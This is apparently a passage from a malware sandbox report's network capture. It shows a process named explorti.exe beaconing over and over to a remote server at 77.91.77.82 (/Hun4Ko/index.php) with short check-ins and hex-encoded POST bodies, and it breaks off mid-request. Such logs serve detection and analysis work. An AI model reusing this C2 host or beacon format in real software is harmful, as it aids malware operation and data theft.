                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:35.609528065 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:35.833111048 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      30192.168.2.44976777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:35.943371058 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:36.674963951 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:36 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:36.676074982 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:36.903374910 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:36 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      31192.168.2.44976877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:37.022329092 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:37.717060089 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:37.718878031 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:37.939316988 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      32192.168.2.44976977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:38.055413961 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:38.778669119 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:38.779680967 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:39.007450104 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      33192.168.2.44977077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:39.130872011 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:39.883047104 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:39.883920908 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:40.104624987 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      34192.168.2.44977177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:40.224618912 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:40.930589914 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:40.931396008 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:41.151613951 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      35192.168.2.44977277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:41.271167994 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:41.978089094 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:41.978976965 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:42.203605890 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      36192.168.2.44977377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:42.318453074 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:43.026921034 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:43.027646065 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:43.262814999 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      37192.168.2.44977477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:43.381133080 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:44.084542990 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:44.085227966 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:44.306369066 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      38192.168.2.44977577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:44.428030968 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:45.131835938 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:45.132637978 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:45.370284081 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      39192.168.2.44977677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:45.492492914 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:46.186440945 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:46.187871933 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:46.403882980 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      40192.168.2.44977777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:46.525557995 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:47.234766006 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:47.235518932 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:47.454616070 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      41192.168.2.44977877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:47.568303108 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:48.270272017 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:48.271167040 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
